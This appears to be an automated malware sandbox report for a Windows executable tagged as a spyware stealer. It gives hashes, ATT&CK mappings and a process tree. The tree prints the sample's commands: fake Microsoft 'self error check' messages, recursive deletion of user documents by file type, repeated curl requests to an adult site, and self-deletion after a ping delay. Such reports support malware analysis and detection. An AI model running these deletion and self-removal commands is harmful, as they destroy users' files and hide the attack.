d7fe758522a322d78f2f545ff6e3e8658054795e64d517ee9d871506bfd8e61b

General

Target

_______________________________________.bin.exe
Size

558KB
MD5

8edf0aa789d976df0c80fd8d62734ded
SHA1

54a8b718fda1ea749df17271d3f897c947004483
SHA256

fb80dab592c5b2a1dcaaf69981c6d4ee7dbf6c1f25247e2ab648d4d0dc115a97
SHA512

577d6e311160a8435ad7b5318e17b51b1e0dbf12ef8e484995890ba48a2860b95ac525b0107bebd312615c05f56320ca8d11946135c6093a01fb27141e548741

Score

7^/10

spyware stealer

Malware Config

Signatures

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery
T1018

Processes:

PING.EXE

pid process

1204 PING.EXE
Suspicious behavior: EnumeratesProcesses 2 IoCs

Processes:

_______________________________________.bin.exe

pid process

2752 _______________________________________.bin.exe
2752 _______________________________________.bin.exe

pid	process
1204	PING.EXE

pid	process
2752	_______________________________________.bin.exe
2752	_______________________________________.bin.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

_______________________________________.bin.exe

description	pid	process	target process
PID 2752 wrote to memory of 1296	2752	_______________________________________.bin.exe	cmd.exe
PID 2752 wrote to memory of 1296	2752	_______________________________________.bin.exe	cmd.exe
PID 2752 wrote to memory of 1296	2752	_______________________________________.bin.exe	cmd.exe
PID 2752 wrote to memory of 1420	2752	_______________________________________.bin.exe	cmd.exe
PID 2752 wrote to memory of 1420	2752	_______________________________________.bin.exe	cmd.exe
PID 2752 wrote to memory of 1420	2752	_______________________________________.bin.exe	cmd.exe
PID 2752 wrote to memory of 3028	2752	_______________________________________.bin.exe	cmd.exe
PID 2752 wrote to memory of 3028	2752	_______________________________________.bin.exe	cmd.exe
PID 2752 wrote to memory of 3028	2752	_______________________________________.bin.exe	cmd.exe
PID 2752 wrote to memory of 1600	2752	_______________________________________.bin.exe	cmd.exe
PID 2752 wrote to memory of 1600	2752	_______________________________________.bin.exe	cmd.exe
PID 2752 wrote to memory of 1600	2752	_______________________________________.bin.exe	cmd.exe
PID 2752 wrote to memory of 3308	2752	_______________________________________.bin.exe	cmd.exe
PID 2752 wrote to memory of 3308	2752	_______________________________________.bin.exe	cmd.exe
PID 2752 wrote to memory of 3308	2752	_______________________________________.bin.exe	cmd.exe
PID 2752 wrote to memory of 412	2752	_______________________________________.bin.exe	cmd.exe
PID 2752 wrote to memory of 412	2752	_______________________________________.bin.exe	cmd.exe
PID 2752 wrote to memory of 412	2752	_______________________________________.bin.exe	cmd.exe
PID 2752 wrote to memory of 3436	2752	_______________________________________.bin.exe	cmd.exe
PID 2752 wrote to memory of 3436	2752	_______________________________________.bin.exe	cmd.exe
PID 2752 wrote to memory of 3436	2752	_______________________________________.bin.exe	cmd.exe
PID 2752 wrote to memory of 4076	2752	_______________________________________.bin.exe	cmd.exe
PID 2752 wrote to memory of 4076	2752	_______________________________________.bin.exe	cmd.exe
PID 2752 wrote to memory of 4076	2752	_______________________________________.bin.exe	cmd.exe
PID 2752 wrote to memory of 3432	2752	_______________________________________.bin.exe	cmd.exe
PID 2752 wrote to memory of 3432	2752	_______________________________________.bin.exe	cmd.exe
PID 2752 wrote to memory of 3432	2752	_______________________________________.bin.exe	cmd.exe
PID 2752 wrote to memory of 3964	2752	_______________________________________.bin.exe	cmd.exe
PID 2752 wrote to memory of 3964	2752	_______________________________________.bin.exe	cmd.exe
PID 2752 wrote to memory of 3964	2752	_______________________________________.bin.exe	cmd.exe
PID 2752 wrote to memory of 576	2752	_______________________________________.bin.exe	cmd.exe
PID 2752 wrote to memory of 576	2752	_______________________________________.bin.exe	cmd.exe
PID 2752 wrote to memory of 576	2752	_______________________________________.bin.exe	cmd.exe
PID 2752 wrote to memory of 2208	2752	_______________________________________.bin.exe	cmd.exe
PID 2752 wrote to memory of 2208	2752	_______________________________________.bin.exe	cmd.exe
PID 2752 wrote to memory of 2208	2752	_______________________________________.bin.exe	cmd.exe
PID 2752 wrote to memory of 3960	2752	_______________________________________.bin.exe	cmd.exe
PID 2752 wrote to memory of 3960	2752	_______________________________________.bin.exe	cmd.exe
PID 2752 wrote to memory of 3960	2752	_______________________________________.bin.exe	cmd.exe
PID 2752 wrote to memory of 640	2752	_______________________________________.bin.exe	cmd.exe
PID 2752 wrote to memory of 640	2752	_______________________________________.bin.exe	cmd.exe
PID 2752 wrote to memory of 640	2752	_______________________________________.bin.exe	cmd.exe
PID 2752 wrote to memory of 1752	2752	_______________________________________.bin.exe	cmd.exe
PID 2752 wrote to memory of 1752	2752	_______________________________________.bin.exe	cmd.exe
PID 2752 wrote to memory of 1752	2752	_______________________________________.bin.exe	cmd.exe
PID 2752 wrote to memory of 2136	2752	_______________________________________.bin.exe	cmd.exe
PID 2752 wrote to memory of 2136	2752	_______________________________________.bin.exe	cmd.exe
PID 2752 wrote to memory of 2136	2752	_______________________________________.bin.exe	cmd.exe
PID 2752 wrote to memory of 3788	2752	_______________________________________.bin.exe	cmd.exe
PID 2752 wrote to memory of 3788	2752	_______________________________________.bin.exe	cmd.exe
PID 2752 wrote to memory of 3788	2752	_______________________________________.bin.exe	cmd.exe
PID 2752 wrote to memory of 2972	2752	_______________________________________.bin.exe	cmd.exe
PID 2752 wrote to memory of 2972	2752	_______________________________________.bin.exe	cmd.exe
PID 2752 wrote to memory of 2972	2752	_______________________________________.bin.exe	cmd.exe
PID 2752 wrote to memory of 2704	2752	_______________________________________.bin.exe	cmd.exe
PID 2752 wrote to memory of 2704	2752	_______________________________________.bin.exe	cmd.exe
PID 2752 wrote to memory of 2704	2752	_______________________________________.bin.exe	cmd.exe
PID 2752 wrote to memory of 2692	2752	_______________________________________.bin.exe	cmd.exe
PID 2752 wrote to memory of 2692	2752	_______________________________________.bin.exe	cmd.exe
PID 2752 wrote to memory of 2692	2752	_______________________________________.bin.exe	cmd.exe
PID 2752 wrote to memory of 1484	2752	_______________________________________.bin.exe	cmd.exe
PID 2752 wrote to memory of 1484	2752	_______________________________________.bin.exe	cmd.exe
PID 2752 wrote to memory of 1484	2752	_______________________________________.bin.exe	cmd.exe
PID 2752 wrote to memory of 2164	2752	_______________________________________.bin.exe	cmd.exe

C:\Users\Admin\AppData\Local\Temp\_______________________________________.bin.exe
"C:\Users\Admin\AppData\Local\Temp\_______________________________________.bin.exe"
1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2752

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c echo Microsoft Windows 10 self error check has been ready...
2⤵
PID:1296

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c echo Copyright (C) 2003-2015 Microsoft Corporation
2⤵
PID:1420

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c echo Copyright (C) 2003-2021 Adobe Corporation
2⤵
PID:3028

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c echo DO NOT STOP THE PROCESS
2⤵
PID:1600

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c echo Wait a minute...
2⤵
PID:3308

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c @echo OFF
2⤵
PID:412

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c del /S /Q *.doc c:\users\%username%\ > nul
2⤵
PID:3436

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c del /S /Q *.docm c:\users\%username%\ > nul
2⤵
PID:4076

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c del /S /Q *.docx c:\users\%username%\ > nul
2⤵
PID:3432

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c del /S /Q *.dot c:\users\%username%\ > nul
2⤵
PID:3964

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c del /S /Q *.dotm c:\users\%username%\ > nul
2⤵
PID:576

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c del /S /Q *.dotx c:\users\%username%\ > nul
2⤵
PID:2208

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c del /S /Q *.pdf c:\users\%username%\ > nul
2⤵
PID:3960

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c del /S /Q *.csv c:\users\%username%\ > nul
2⤵
PID:640

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c del /S /Q *.xls c:\users\%username%\ > nul
2⤵
PID:1752

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c del /S /Q *.xlsx c:\users\%username%\ > nul
2⤵
PID:2136

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c del /S /Q *.xlsm c:\users\%username%\ > nul
2⤵
PID:3788

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c del /S /Q *.ppt c:\users\%username%\ > nul
2⤵
PID:2972

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c del /S /Q *.pptx c:\users\%username%\ > nul
2⤵
PID:2704

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c del /S /Q *.pptm c:\users\%username%\ > nul
2⤵
PID:2692

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c del /S /Q *.jtdc c:\users\%username%\ > nul
2⤵
PID:1484

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c del /S /Q *.jttc c:\users\%username%\ > nul
2⤵
PID:2164

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c del /S /Q *.jtd c:\users\%username%\ > nul
2⤵
PID:192

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c del /S /Q *.jtt c:\users\%username%\ > nul
2⤵
PID:204

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c del /S /Q *.txt c:\users\%username%\ > nul
2⤵
PID:1844

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c del /S /Q *.exe c:\users\%username%\ > nul
2⤵
PID:348

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c del /S /Q *.log c:\users\%username%\ > nul
2⤵
PID:3328

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A "Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0" https://www.xvideos.com/video64080443/_ > nul
2⤵
PID:2252

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A "Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0" https://www.xvideos.com/video64080443/_ > nul
2⤵
PID:3724

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A "Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0" https://www.xvideos.com/video64080443/_ > nul
2⤵
PID:2628

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A "Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0" https://www.xvideos.com/video64080443/_ > nul
2⤵
PID:3016

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A "Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0" https://www.xvideos.com/video64080443/_ > nul
2⤵
PID:2156

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A "Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0" https://www.xvideos.com/video64080443/_ > nul
2⤵
PID:1604

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A "Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0" https://www.xvideos.com/video64080443/_ > nul
2⤵
PID:3428

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A "Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0" https://www.xvideos.com/video64080443/_ > nul
2⤵
PID:4084

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A "Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0" https://www.xvideos.com/video64080443/_ > nul
2⤵
PID:1300

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A "Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0" https://www.xvideos.com/video64080443/_ > nul
2⤵
PID:2084

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A "Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0" https://www.xvideos.com/video64080443/_ > nul
2⤵
PID:1288

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A "Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0" https://www.xvideos.com/video64080443/_ > nul
2⤵
PID:3404

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A "Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0" https://www.xvideos.com/video64080443/_ > nul
2⤵
PID:3332

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A "Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0" https://www.xvideos.com/video64080443/_ > nul
2⤵
PID:3952

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A "Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0" https://www.xvideos.com/video64080443/_ > nul
2⤵
PID:2192

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A "Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0" https://www.xvideos.com/video64080443/_ > nul
2⤵
PID:4000

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A "Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0" https://www.xvideos.com/video64080443/_ > nul
2⤵
PID:3980

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A "Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0" https://www.xvideos.com/video64080443/_ > nul
2⤵
PID:2424

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A "Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0" https://www.xvideos.com/video64080443/_ > nul
2⤵
PID:2152

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A "Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0" https://www.xvideos.com/video64080443/_ > nul
2⤵
PID:2148

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A "Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0" https://www.xvideos.com/video64080443/_ > nul
2⤵
PID:3216

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A "Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0" https://www.xvideos.com/video64080443/_ > nul
2⤵
PID:2736

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A "Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0" https://www.xvideos.com/video64080443/_ > nul
2⤵
PID:3832

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A "Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0" https://www.xvideos.com/video64080443/_ > nul
2⤵
PID:2636

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A "Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0" https://www.xvideos.com/video64080443/_ > nul
2⤵
PID:2524

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A "Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0" https://www.xvideos.com/video64080443/_ > nul
2⤵
PID:3124

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A "Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0" https://www.xvideos.com/video64080443/_ > nul
2⤵
PID:1748

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A "Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0" https://www.xvideos.com/video64080443/_ > nul
2⤵
PID:1776

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A "Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0" https://www.xvideos.com/video64080443/_ > nul
2⤵
PID:3032

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A "Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0" https://www.xvideos.com/video64080443/_ > nul
2⤵
PID:2244

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A "Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0" https://www.xvideos.com/video64080443/_ > nul
2⤵
PID:192

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A "Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0" https://www.xvideos.com/video64080443/_ > nul
2⤵
PID:3136

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A "Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0" https://www.xvideos.com/video64080443/_ > nul
2⤵
PID:2220

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A "Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0" https://www.xvideos.com/video64080443/_ > nul
2⤵
PID:812

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A "Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0" https://www.xvideos.com/video64080443/_ > nul
2⤵
PID:636

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A "Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0" https://www.xvideos.com/video64080443/_ > nul
2⤵
PID:1008

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A "Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0" https://www.xvideos.com/video64080443/_ > nul
2⤵
PID:2696

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A "Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0" https://www.xvideos.com/video64080443/_ > nul
2⤵
PID:3956

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A "Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0" https://www.xvideos.com/video64080443/_ > nul
2⤵
PID:3752

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A "Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0" https://www.xvideos.com/video64080443/_ > nul
2⤵
PID:3016

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A "Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0" https://www.xvideos.com/video64080443/_ > nul
2⤵
PID:2160

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A "Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0" https://www.xvideos.com/video64080443/_ > nul
2⤵
PID:1600

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A "Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0" https://www.xvideos.com/video64080443/_ > nul
2⤵
PID:3616

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A "Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0" https://www.xvideos.com/video64080443/_ > nul
2⤵
PID:3428

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A "Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0" https://www.xvideos.com/video64080443/_ > nul
2⤵
PID:3348

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A "Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0" https://www.xvideos.com/video64080443/_ > nul
2⤵
PID:2000

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A "Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0" https://www.xvideos.com/video64080443/_ > nul
2⤵
PID:2056

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A "Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0" https://www.xvideos.com/video64080443/_ > nul
2⤵
PID:2084

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A "Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0" https://www.xvideos.com/video64080443/_ > nul
2⤵
PID:1172

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A "Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0" https://www.xvideos.com/video64080443/_ > nul
2⤵
PID:3088

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A "Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0" https://www.xvideos.com/video64080443/_ > nul
2⤵
PID:3432

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A "Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0" https://www.xvideos.com/video64080443/_ > nul
2⤵
PID:3152

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A "Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0" https://www.xvideos.com/video64080443/_ > nul
2⤵
PID:2108

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A "Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0" https://www.xvideos.com/video64080443/_ > nul
2⤵
PID:576

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A "Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0" https://www.xvideos.com/video64080443/_ > nul
2⤵
PID:2192

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A "Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0" https://www.xvideos.com/video64080443/_ > nul
2⤵
PID:2180

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A "Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0" https://www.xvideos.com/video64080443/_ > nul
2⤵
PID:1488

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A "Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0" https://www.xvideos.com/video64080443/_ > nul
2⤵
PID:640

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A "Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0" https://www.xvideos.com/video64080443/_ > nul
2⤵
PID:2424

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A "Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0" https://www.xvideos.com/video64080443/_ > nul
2⤵
PID:2004

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A "Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0" https://www.xvideos.com/video64080443/_ > nul
2⤵
PID:3940

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A "Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0" https://www.xvideos.com/video64080443/_ > nul
2⤵
PID:2700

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A "Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0" https://www.xvideos.com/video64080443/_ > nul
2⤵
PID:3788

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A "Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0" https://www.xvideos.com/video64080443/_ > nul
2⤵
PID:2668

C:\Windows\SysWOW64\cmd.exe
cmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\_______________________________________.bin.exe"
2⤵
PID:2352

C:\Windows\SysWOW64\PING.EXE
ping 1.1.1.1 -n 1 -w 3000
3⤵
- Runs ping.exe
PID:1204

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Credentials in Files

1

T1081

Discovery

Remote System Discovery

1

T1018

Lateral Movement

Collection

Data from Local System

1

T1005

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

